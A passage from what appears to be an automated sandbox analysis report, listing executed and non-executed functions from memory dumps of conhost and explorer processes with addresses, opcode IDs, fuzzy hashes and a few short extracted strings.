                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e8e70532c25e40bd15dc2b14c0f90f84e03ca9884a38c2f0bd9456ee9bf61cd
                                                            • Instruction ID: 1ffde406c1b55f5d8a9f2d56bd1c6cf415095ea8396120da0f3d120a46716b98
                                                            • Opcode Fuzzy Hash: 3e8e70532c25e40bd15dc2b14c0f90f84e03ca9884a38c2f0bd9456ee9bf61cd
                                                            • Instruction Fuzzy Hash: 19E06D2064E3C04FCB0AAB3488A88547F60EE6720134A46EEC485CF1A7DA2D8889C711
                                                            Function 00007FFD348A06F2 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d20051572f8ab65bbc61363d2ae0d262ba6f41f2c51e5cea1e06876f8bc17ab4
                                                            • Instruction ID: 66c75b40299f0f4d489785dc1076b92980e8cdbe53304afc3d67fa0fc5274f24
                                                            • Opcode Fuzzy Hash: d20051572f8ab65bbc61363d2ae0d262ba6f41f2c51e5cea1e06876f8bc17ab4
                                                            • Instruction Fuzzy Hash: A0E04F51E4F78A06E6822ABD19F60AD6A541F93218F9C00B2D64DD6193B8CE30992677
                                                            Function 00007FFD348DDBA9 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a27348e0f9c38c142d51c3571747ba6f07934ca660d47f13078d703ae2eb9453
                                                            • Instruction ID: 4d2b68f2bd693f7948f664e7a9a0f454ba35d271a549b5939d1640182f195ba8
                                                            • Opcode Fuzzy Hash: a27348e0f9c38c142d51c3571747ba6f07934ca660d47f13078d703ae2eb9453
                                                            • Instruction Fuzzy Hash: DAE04F2294F7C08FCB5B973488A98943FB0DE1722574A51EBC145CF5B3DA1E8C8AC701
                                                            Function 00007FFD348A2E4C Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction ID: 190f0a8a213a581b0c04eb4b02a759318e19f9084cd2505f1fee32b50ff71a4e
                                                            • Opcode Fuzzy Hash: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction Fuzzy Hash: 81E01261F0E41646FBD4A754D4A07A96255DB49310F180078DB4ED33C1CD6CAD409B16
                                                            Function 00007FFD348DA830 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Function 00007FFD348DA7A0 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Function 00007FFD348D7CD9 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dc90959212a66237be670a1f63e886822a31c4ff1a63436a829f6d3804f97e5d
                                                            • Instruction ID: c1445d11cf6b1536b8bb6d1d2afec04b5159164c72720dd96d831389b25f1b73
                                                            • Opcode Fuzzy Hash: dc90959212a66237be670a1f63e886822a31c4ff1a63436a829f6d3804f97e5d
                                                            • Instruction Fuzzy Hash: 35E01A3194F7C04FC74B973588A88447F61AE1721474A41EAC145CF1A3D92A8849C701
                                                            Function 00007FFD348D92F9 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54e1152496b5787006061ca855949dc64b7651aa651a7ebb74acfe6e9e757138
                                                            • Instruction ID: 566691c56397bb7c355c27ddeeb8fc37abc6a5633e5b928bf60e0533d9825150
                                                            • Opcode Fuzzy Hash: 54e1152496b5787006061ca855949dc64b7651aa651a7ebb74acfe6e9e757138
                                                            • Instruction Fuzzy Hash: 6AE0EC3154E7C44FC70B973488699503FB0AE2721178B01CBD045CF5B3EA598C88C762
                                                            Function 00007FFD348DDC29 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d51e7a8fb824f2fb87136fc916e8dc09be8bda1b15c175bfccdcb77bcc594031
                                                            • Instruction ID: 0521b0e099d1c4137aae42a3ab6020a654812c4050c531ad6e2acc5b2555c454
                                                            • Opcode Fuzzy Hash: d51e7a8fb824f2fb87136fc916e8dc09be8bda1b15c175bfccdcb77bcc594031
                                                            • Instruction Fuzzy Hash: 42E01A3294F7C04FC70B973588A98457FB0EE1721074A45EAC185CF1A3D5298849C701
                                                            Function 00007FFD348A0B95 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction ID: 8acf1c5b332099b2246399b80d3ac6c9f554998e3a77f5c7c8a16b79e6bbc71c
                                                            • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction Fuzzy Hash: C1D0A930629A4E8FDA40B738C89A8247BA0FF0F211FC914E1E008C71A2D60888A9C700
                                                            Function 00007FFD348D1C60 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                            Function 00007FFD348D7238 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                            • Instruction ID: 02508949ed5eb1f4d71aa9fc3999beb4500624c51e885bcaf86093aed21b2f8f
                                                            • Opcode Fuzzy Hash: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                            • Instruction Fuzzy Hash: F9D01234B529044F870CA7388C998747391EB6B6167D541A9D40BC72B1DD6ADC89C741
                                                            Function 00007FFD348DBAE8 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e30a70fdf3be1c2062e9d2c23b2e8354167320d4b8d6ed77101f0ce33f1e901
                                                            • Instruction ID: db2e18249e68ae768ba9197b9f77bc84fbec4c11934f42b965e3f2a592c71c40
                                                            • Opcode Fuzzy Hash: 0e30a70fdf3be1c2062e9d2c23b2e8354167320d4b8d6ed77101f0ce33f1e901
                                                            • Instruction Fuzzy Hash: 4FD01234B919044F871CB73C88A987473E1EB6B21A79545A9D00AC72B1D96ADC89C741
                                                            Function 00007FFD348A06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 034f2f9127c1509428e41563de5c0a43d5071b4447ae523b29c7ff65ba71b807
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: C6C04C05F5B61F01B8957B6E58E60ACA1405BD7714FDD1172D74DD00D1ACCD20D92177
                                                            Function 00007FFD348A12B0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: b000458af23801af5d7a1d6781a6c87292a975ce16cbf5cab5fe5ffb1a1b6739
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 95C08C305118098FC988EB28C88480433A0FB0A300BC10090E408C7170D25ADCC1D781
                                                            Function 00007FFD348A4C37 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 694a6ff74643480b845759cb43dad0d6f047f0242a54711fb743fa187c037cdf
                                                            • Instruction ID: 2dcc27fd492da1d85c39c56db41f0e37b2fad65d69696017452e89b0fabc2080
                                                            • Opcode Fuzzy Hash: 694a6ff74643480b845759cb43dad0d6f047f0242a54711fb743fa187c037cdf
                                                            • Instruction Fuzzy Hash: 3CC08C01F0C82642F3E4228400302BD04064F84300F484034E20DE73CACD6C6D0102C6
                                                            Function 00007FFD348A06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: b227916acbea63441ba49516ee55eaf2e04fb610f2ad6c6872f37c3405b7b73b
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: F2B01200E6740F00A488377E08E206470405B47200FC810B0D70DC008198CD20982263
                                                            Function 00007FFD348A1FF7 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 970184ef5f453681c824ba3ee8f1bfc658b3069047c65a3a19f2bf84c4be51f5
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 20C02B30F0E01C40E7A4473048510FA32014F43304F0D41F1810AF7082CC3C18003120

                                                            Non-executed Functions

                                                            Function 00007FFD348A09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
                                                            • Instruction ID: 1aa783e87f7f83d51ef045af4f10062e2c7bb6e07b19927c41d851be2c32a240
                                                            • Opcode Fuzzy Hash: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
                                                            • Instruction Fuzzy Hash: 54418F07B0956267E12137FD75711EEABA88F82379B0C5677E24CDA0C3ACB8748582E5

                                                            Executed Functions

                                                            Function 00007FFD34890D4C Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5[_H
                                                            • API String ID: 0-3279724263
                                                            • Opcode ID: 9c5009e042b39d0d92390fe1c20e4ae3ed8882c838e00cb770ffffd912156729
                                                            • Instruction ID: 99db729712a96a56c8ce7dcc03ce44bb2dc77d58bbb3598897986ac65d5913da
                                                            • Opcode Fuzzy Hash: 9c5009e042b39d0d92390fe1c20e4ae3ed8882c838e00cb770ffffd912156729
                                                            • Instruction Fuzzy Hash: 1C91E575A18A894FE799DBAC88B93A97FE1FF96314F0401BEC149D72D2CB796811C340
                                                            Function 00007FFD348907D0 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAx4
                                                            • API String ID: 0-3371061106
                                                            • Opcode ID: 1a8b4229c3e9811427d88b22b70b7dacc3a7c469e428222fb842d2a8d3fd57fa
                                                            • Instruction ID: d8e9bbce5d6d5e7a0ed28f439d3dd366817fb54bae4eb09be2a8a4a0466d7e82
                                                            • Opcode Fuzzy Hash: 1a8b4229c3e9811427d88b22b70b7dacc3a7c469e428222fb842d2a8d3fd57fa
                                                            • Instruction Fuzzy Hash: 48312621A0DA890FE7569B3888751A97FB1EF87210F0941F7D549C71E3ED2C69069781
                                                            Function 00007FFD348908D0 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d6b16834579cfd37e7c1b31bf0f8b13d7839bd2f7e208e3524b1d87fab4ad7a3
                                                            • Instruction ID: 3d6ec788da90c8ca7bbfc8d56ff3e329eccd4eccc8f29abd3b92409cf852ecb9
                                                            • Opcode Fuzzy Hash: d6b16834579cfd37e7c1b31bf0f8b13d7839bd2f7e208e3524b1d87fab4ad7a3
                                                            • Instruction Fuzzy Hash: 3B410422B1C9661BE754B7FCA0F92FE7B91DF86325B0804BFD14DC7193DD28A8418284
                                                            Function 00007FFD3489090D Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd185d822cb6123088ed5a3b1781b92f97e38a5cb1a91f945b05e1a528612453
                                                            • Instruction ID: e8ee9b5c01e14034920442c32f4821162fbe2341a5058b4c644aa2e3a96bd049
                                                            • Opcode Fuzzy Hash: fd185d822cb6123088ed5a3b1781b92f97e38a5cb1a91f945b05e1a528612453
                                                            • Instruction Fuzzy Hash: A1411322B1CA661FE718B7FCA0BA6F97B91EF85325B08047AD10DC7193DD28B8418284
                                                            Function 00007FFD34890908 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f7b48fb1645722d62dc5b79b0a7f16b485012c1d121dfbc5daa147e74b11fe7
                                                            • Instruction ID: 84d065431b6238741b8624aeadf420d18c62c6a80688c06adf7a7c388da02e71
                                                            • Opcode Fuzzy Hash: 2f7b48fb1645722d62dc5b79b0a7f16b485012c1d121dfbc5daa147e74b11fe7
                                                            • Instruction Fuzzy Hash: 3E21D83130CC184FE768EB5CE889DB977D1EF9A32171501BAE58EC7265E915EC8287C1
                                                            Function 00007FFD34894525 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b08881d1e9328da80f73801fb315f880e26def6e2356d4c289539a1d48309e1
                                                            • Instruction ID: 1d63c0663c573cd9d3822c518b54690657afe8b523c1ad10fa1abd7cebecfa83
                                                            • Opcode Fuzzy Hash: 4b08881d1e9328da80f73801fb315f880e26def6e2356d4c289539a1d48309e1
                                                            • Instruction Fuzzy Hash: BF314E21B0CE1A8FEBD5EB6884A57B86A91FF5B700F5000B5D60ED7292DE2CAC40A701
                                                            Function 00007FFD3489116D Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6afa570bb65993b50dd73d0d3c2d1d909ba2f776c06ec32b7c9e8b5637a0c99f
                                                            • Instruction ID: 320f85aa60bd101ceb5a2b097a66472045d96773efe9dc1fc7908424eeb5a5a5
                                                            • Opcode Fuzzy Hash: 6afa570bb65993b50dd73d0d3c2d1d909ba2f776c06ec32b7c9e8b5637a0c99f
                                                            • Instruction Fuzzy Hash: 2031A431A0C94A9FEB45EB68C8A59F97BF1FF5A310B0445BAC009D71A2DF38A941CB40
                                                            Function 00007FFD34890998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b2f4d3a1f3781fa03888bbf71dd6c4387f08694c87d3e5cb0c862fb4ad13e79
                                                            • Instruction ID: 25ac0ea99cbf9b3cf07f776ab48e400a0a11fc9d0ea6ce470ff0af40f722c8b2
                                                            • Opcode Fuzzy Hash: 7b2f4d3a1f3781fa03888bbf71dd6c4387f08694c87d3e5cb0c862fb4ad13e79
                                                            • Instruction Fuzzy Hash: 1521DA11B28D690FE798E76C94E96B97AC2DB99311F50007DE50DC33D2DD28EC414280
                                                            Function 00007FFD34890C25 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ffdaca98255a55ff1f184313f8256cc3b17a7e1d59f6c7c4843e3a741cb49f4
                                                            • Instruction ID: 1d67e73008c6b2a05a3333bc4d32094af516e145834ef2e4eab3ac09043903f1
                                                            • Opcode Fuzzy Hash: 3ffdaca98255a55ff1f184313f8256cc3b17a7e1d59f6c7c4843e3a741cb49f4
                                                            • Instruction Fuzzy Hash: FA212936F0DA499FE712ABB898A10EC7F60EF83324F0441B3D148CB183D93C654A9781
                                                            Function 00007FFD348956F0 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f28490c7a00754937696db14fc87fb04bd9ba4c9ff8db08d62e8c34332e81a5d
                                                            • Instruction ID: b0ca0afa20b0925388c84ee678f94e1ce1a0210da12703f05fd23dc29a583175
                                                            • Opcode Fuzzy Hash: f28490c7a00754937696db14fc87fb04bd9ba4c9ff8db08d62e8c34332e81a5d
                                                            • Instruction Fuzzy Hash: 49114F31A08A09DFEB94EF48C494BAD77F2EB69315F15416AC00ED72A0CB39A981DB44
                                                            Function 00007FFD34890C38 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 513be29b49373755294ecea3740a46af561bec4037a55aa8c06a22000b42bae1
                                                            • Instruction ID: 250a6e45036456f954150677ca34cd749545df79645219547b4c442cf001c4ff
                                                            • Opcode Fuzzy Hash: 513be29b49373755294ecea3740a46af561bec4037a55aa8c06a22000b42bae1
                                                            • Instruction Fuzzy Hash: B211C636F0DA498FE712DB6888A11DD7FB0EF93314F1544B6D144DB192D93C654A9780
                                                            Function 00007FFD34890C40 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 95eb2f2cf0a6e3838f9a7fcb9c0ccc85e67ef9d36f74f9064909b19541c89f5e
                                                            • Instruction ID: 3a34b7cae0141c73d19194d65051d19c407a825c82342f861099852e1877b2e1
                                                            • Opcode Fuzzy Hash: 95eb2f2cf0a6e3838f9a7fcb9c0ccc85e67ef9d36f74f9064909b19541c89f5e
                                                            • Instruction Fuzzy Hash: 6B11A136F0EA898FE712DB6888A019D7FB0EF53314F1540B6D144DB292DA3C6649A780
                                                            Function 00007FFD34890C50 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
